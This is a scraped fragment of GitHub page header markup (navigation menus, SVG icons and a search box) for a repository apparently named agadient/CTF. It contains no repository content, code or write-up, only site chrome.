<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div>
Explore
All features
Documentation
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
GitHub Skills
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Blog
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For
Enterprise
Teams
Startups
Education
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
By Solution
CI/CD & Automation
DevOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
DevSecOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Case Studies
Customer Stories
Resources
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4">
<div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div>
<div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div>
Repositories
Topics
Trending
Collections
</div>
Pricing
</nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0">
<div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="167091212" data-scoped-search-url="/agadient/CTF/search" data-owner-scoped-search-url="/users/agadient/search" data-unscoped-search-url="/search" data-turbo="false" action="/agadient/CTF/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="twe46W3Qb5XWCSj6dGQjxsvpYGhDkPpAi/6NxXejzPAAdlXK3l4ocp8khwm/CBeQ1nnPYRa+eQGTn19fLl5Fmg==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div>
Sign up </div> </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div id="js-flash-container" data-turbo-replace>
